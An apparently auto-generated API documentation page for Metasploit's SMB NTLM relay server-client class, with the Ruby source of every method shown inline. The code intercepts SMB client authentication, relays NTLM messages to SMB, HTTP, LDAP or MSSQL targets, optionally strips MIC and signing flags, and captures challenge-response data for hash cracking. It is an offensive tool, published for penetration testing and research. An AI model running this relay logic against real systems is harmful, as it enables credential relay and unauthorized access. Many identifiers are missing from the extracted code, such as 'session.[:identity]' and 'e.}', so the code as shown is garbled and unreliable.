Class: Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient
- Inherits:
-
RubySMB::Server::ServerClient
- Object
- RubySMB::Server::ServerClient
- Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient
- Defined in:
- lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
Overview
This class represents a single connected client to the server. It stores and processes connection specific related information. Has overridden methods than allow smb relay attacks.
Constant Summary collapse
- FORCE_RETRY_SESSION_SETUP =
The NT Status that will cause a client to reattempt authentication
::WindowsError::NTStatus::STATUS_NETWORK_SESSION_EXPIRED
Instance Method Summary collapse
- #create_relay_client(target, timeout) ⇒ Object
- #do_session_setup_smb2(request, session) ⇒ Object
- #do_tree_connect_smb2(request, session) ⇒ Object
-
#handle_smb1(raw_request, header) ⇒ RubySMB::GenericPacket
Handle an SMB version 1 message.
-
#initialize(server, dispatcher, relay_timeout:, relay_targets:, listener:) ⇒ ServerClient
constructor
A new instance of ServerClient.
- #prepare_relay(session) ⇒ Object
- #process_gss_spnego_init(incoming_security_buffer) ⇒ Object
- #process_gss_spnego_targ(incoming_security_buffer) ⇒ Object
- #relay_ntlmssp(session, incoming_security_buffer = nil) ⇒ Object
- #valid_ntlm_blob?(blob) ⇒ Boolean
- #validate_ntlm_blob!(blob) ⇒ Object
Constructor Details
#initialize(server, dispatcher, relay_timeout:, relay_targets:, listener:) ⇒ ServerClient
Returns a new instance of ServerClient.
12 13 14 15 16 17 18 19 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 12 def initialize(server, dispatcher, relay_timeout:, relay_targets:, listener:) super(server, dispatcher) @timeout = relay_timeout @relay_targets = relay_targets @relay_timeout = relay_timeout @listener = listener end |
Instance Method Details
#create_relay_client(target, timeout) ⇒ Object
284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 284 def create_relay_client(target, timeout) case target.protocol when :http, :https client = Target::HTTP::Client.create(self, target, logger, timeout) when :smb client = Target::SMB::Client.create(self, target, logger, timeout) when :ldap client = Target::LDAP::Client.create(self, target, logger, timeout) when :mssql client = Target::MSSQL::Client.create(self, target, logger, timeout, framework_module: @listener) else raise RuntimeError, "unsupported protocol: #{target.protocol}" end client rescue ::Rex::ConnectionTimeout => e msg = "Timeout error retrieving server challenge from target #{target}. Most likely caused by unresponsive target" elog(msg, error: e) logger.print_error msg nil rescue ::Exception => e msg = "Unable to create relay to #{target}" elog(msg, error: e) logger.print_error msg nil end |
#do_session_setup_smb2(request, session) ⇒ Object
73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 73 def do_session_setup_smb2(request, session) # TODO: Add shared helper for grabbing session lookups session_id = request.smb2_header.session_id if session_id == 0 session_id = rand(1..0xfffffffe) session = @session_table[session_id] = ::RubySMB::Server::Session.new(session_id) else session = @session_table[session_id] if session.nil? response = SMB2::Packet::ErrorPacket.new response.smb2_header.nt_status = WindowsError::NTStatus::STATUS_USER_SESSION_DELETED return response end end # Prepare the relay now, if there's only one target to relay to and this is the first session setup message if @relay_targets && @relay_targets.each.size == 1 && request.smb2_header. == 1 session.[:relay_target] = @relay_targets.next(session.[:identity]) prepare_relay(session) end # Perform a normal setup flow with ruby_smb unless session&.[:relay_mode] response = super session.[:identity] = session.user_id # TODO: Remove guest flag return response end relay_result = self.relay_ntlmssp(session, request.buffer.to_binary_s) return if relay_result.nil? response = ::RubySMB::SMB2::Packet::SessionSetupResponse.new response.smb2_header.credits = 1 response.smb2_header. = request.smb2_header. response.smb2_header.session_id = session_id response.smb2_header.nt_status = relay_result.nt_status.value if relay_result.nt_status == ::WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED response.smb2_header.nt_status = ::WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED.value if relay_result. && session.[:ntlm_wrapper] == :none response.buffer = relay_result..serialize elsif relay_result. && session.[:ntlm_wrapper] == :gss_spnego response.buffer = RubySMB::Gss.gss_type2(relay_result..serialize) end if @dialect == '0x0311' update_preauth_hash(response) end return response end update_preauth_hash(request) if @dialect == '0x0311' if relay_result.nt_status == WindowsError::NTStatus::STATUS_SUCCESS response.smb2_header.credits = 32 session.state = :valid session.user_id = session.[:identity] # TODO: This is invalid now with the relay logic in place session.key = @gss_authenticator.session_key session.signing_required = request.security_mode.signing_required == 1 elsif relay_result.nt_status == WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED && @dialect == '0x0311' update_preauth_hash(response) end response end |
#do_tree_connect_smb2(request, session) ⇒ Object
44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 44 def do_tree_connect_smb2(request, session) logger.print_status("Received request for #{session.[:identity]}") # Attempt to select the next target to relay to session.[:relay_target] = @relay_targets.next(session.[:identity]) # If there's no more targets to relay to, just tree connect to the currently running server instead if session.[:relay_target].nil? logger.print_status("Identity: #{session.[:identity]} - All targets relayed to") return super(request, session) end prepare_relay(session) response = RubySMB::SMB2::Packet::TreeConnectResponse.new response.smb2_header.nt_status = FORCE_RETRY_SESSION_SETUP.value response end |
#handle_smb1(raw_request, header) ⇒ RubySMB::GenericPacket
Handle an SMB version 1 message.
67 68 69 70 71 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 67 def handle_smb1(raw_request, header) _port, ip_address = ::Socket::unpack_sockaddr_in(getpeername) logger.print_warning("Cannot relay request from #{ip_address}. The SMB1 #{::RubySMB::SMB1::Commands.name(header.command)} command is not supported - https://github.com/rapid7/metasploit-framework/issues/16261") raise NotImplementedError end |
#prepare_relay(session) ⇒ Object
21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 21 def prepare_relay(session) logger.print_status("Relaying to next target #{session.[:relay_target]}") if session.[:relay_target].protocol == :smb && session.[:relay_target].ip == peerhost logger.print_warning('Relaying SMB to SMB on the same host will not work if the target has been patched for MS08-068') end relayed_connection = create_relay_client( session.[:relay_target], @relay_timeout ) if relayed_connection.nil? @relay_targets.on_relay_end(session.[:relay_target], identity: session.[:identity], is_success: false) session.[:relay_mode] = false else session.[:relay_mode] = true end session.[:relayed_connection] = relayed_connection session.state = :in_progress end |
#process_gss_spnego_init(incoming_security_buffer) ⇒ Object
152 153 154 155 156 157 158 159 160 161 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 152 def process_gss_spnego_init(incoming_security_buffer) begin gss_init = Rex::Proto::Gss::SpnegoNegTokenInit.parse(incoming_security_buffer) ntlm_blob = gss_init.mech_token validate_ntlm_blob!(ntlm_blob) ntlm_blob rescue RASN1::ASN1Error => e raise ArgumentError, "Failed to parse NTLMSSP Type1 message from GSS: #{e.}" end end |
#process_gss_spnego_targ(incoming_security_buffer) ⇒ Object
163 164 165 166 167 168 169 170 171 172 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 163 def process_gss_spnego_targ(incoming_security_buffer) begin gss_targ = Rex::Proto::Gss::SpnegoNegTokenTarg.parse(incoming_security_buffer) ntlm_blob = gss_targ.response_token validate_ntlm_blob!(ntlm_blob) ntlm_blob rescue RASN1::ASN1Error, ArgumentError => e raise ArgumentError, "Failed to parse NTLMSSP Type3 message from GSS: #{e.}" end end |
#relay_ntlmssp(session, incoming_security_buffer = nil) ⇒ Object
174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 174 def relay_ntlmssp(session, incoming_security_buffer = nil) # TODO: Add support for a default NTLM provider in ruby_smb begin buf = incoming_security_buffer.to_s.b if valid_ntlm_blob?(buf) = Net::NTLM::Message.parse(buf) session.[:ntlm_wrapper] = :none else gss_api = OpenSSL::ASN1.decode(buf) if gss_api&.tag == 0 && gss_api&.tag_class == :APPLICATION incoming_security_buffer = process_gss_spnego_init(incoming_security_buffer) = Net::NTLM::Message.parse(incoming_security_buffer) elsif gss_api&.tag == 1 && gss_api&.tag_class == :CONTEXT_SPECIFIC incoming_security_buffer = process_gss_spnego_targ(incoming_security_buffer) = Net::NTLM::Message.parse(incoming_security_buffer) end session.[:ntlm_wrapper] = :gss_spnego end rescue ArgumentError, OpenSSL::ASN1::ASN1Error => e logger.print_error("Failed to parse incoming NTLM message: #{e.}") return end # NTLM negotiation request # Choose the next machine to relay to, and send the incoming security buffer to the relay target if .is_a?(::Net::NTLM::Message::Type1) relayed_connection = session.[:relayed_connection] logger.info( "Relaying NTLM type 1 message to #{relayed_connection.target} "\ "(Always Sign: #{.has_flag?(:ALWAYS_SIGN)}, "\ "Sign: #{.has_flag?(:SIGN)}, Seal: #{.has_flag?(:SEAL)})" ) if relayed_connection.target.drop_mic_and_sign_key_exch_flags incoming_security_buffer = do_drop_mic_and_flags() elsif relayed_connection.target.drop_mic_only incoming_security_buffer = do_drop_mic() end relay_result = relayed_connection.relay_ntlmssp_type1(incoming_security_buffer) return nil unless relay_result&.nt_status == WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED # Store the incoming negotiation message, i.e. ntlm_type1 session.[:incoming_negotiate_message] = # Store the relay target's server challenge, as it is used later when creating the JTR hash session.[:relay_target_server_challenge] = relay_result. relay_result # NTLM challenge, which should never be received from a calling client elsif .is_a?(::Net::NTLM::Message::Type2) RubySMB::Gss::Provider::Result.new(nil, WindowsError::NTStatus::STATUS_LOGON_FAILURE) # NTLM challenge response elsif .is_a?(::Net::NTLM::Message::Type3) relayed_connection = session.[:relayed_connection] logger.info("Relaying #{.ntlm_version == :ntlmv2 ? 'NTLMv2' : 'NTLMv1'} type 3 message to #{relayed_connection.target} as #{session.[:identity]}") if relayed_connection.target.drop_mic_and_sign_key_exch_flags incoming_security_buffer = do_drop_mic_and_flags() elsif relayed_connection.target.drop_mic_only incoming_security_buffer = do_drop_mic() end relay_result = relayed_connection.relay_ntlmssp_type3(incoming_security_buffer) is_success = relay_result&.nt_status == WindowsError::NTStatus::STATUS_SUCCESS @relay_targets.on_relay_end(relayed_connection.target, identity: session.[:identity], is_success: is_success) if is_success logger.print_good("Identity: #{session.[:identity]} - Successfully authenticated against relay target #{relayed_connection.target}") session.[:incoming_challenge_response] = @listener.on_ntlm_type3( address: relayed_connection.target.ip, ntlm_type1: session.[:incoming_negotiate_message], ntlm_type2: session.[:relay_target_server_challenge], ntlm_type3: session.[:incoming_challenge_response] ) @listener.on_relay_success(relay_connection: relayed_connection, relay_identity: session.[:identity]) else @listener.on_relay_failure(relay_connection: relayed_connection) relayed_connection.disconnect! if relay_result.nil? || relay_result.nt_status.nil? logger.print_error("Identity: #{session.[:identity]} - Relay against target #{relayed_connection.target} failed with unknown error") elsif relay_result.nt_status == WindowsError::NTStatus::STATUS_LOGON_FAILURE logger.print_warning("Identity: #{session.[:identity]} - Relayed client authentication failed on target server #{relayed_connection.target}") else error_code = WindowsError::NTStatus.find_by_retval(relay_result.nt_status.value).first if error_code.nil? logger.print_warning("Identity: #{session.[:identity]} - Relay against target #{relayed_connection.target} failed with unexpected error: #{relay_result.nt_status.value}") else logger.print_warning("Identity: #{session.[:identity]} - Relay against target #{relayed_connection.target} failed with unexpected error: #{error_code.name}: #{error_code.description}") end end session..delete(:relay_mode) end relay_result # Should never occur else logger.error("Invalid ntlm request") RubySMB::Gss::Provider::Result.new(nil, WindowsError::NTStatus::STATUS_LOGON_FAILURE) end end |
#valid_ntlm_blob?(blob) ⇒ Boolean
142 143 144 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 142 def valid_ntlm_blob?(blob) blob&.start_with?("NTLMSSP\x00") end |
#validate_ntlm_blob!(blob) ⇒ Object
146 147 148 149 150 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 146 def validate_ntlm_blob!(blob) unless valid_ntlm_blob?(blob) raise ArgumentError, 'The NTLM blob found was malformed' end end |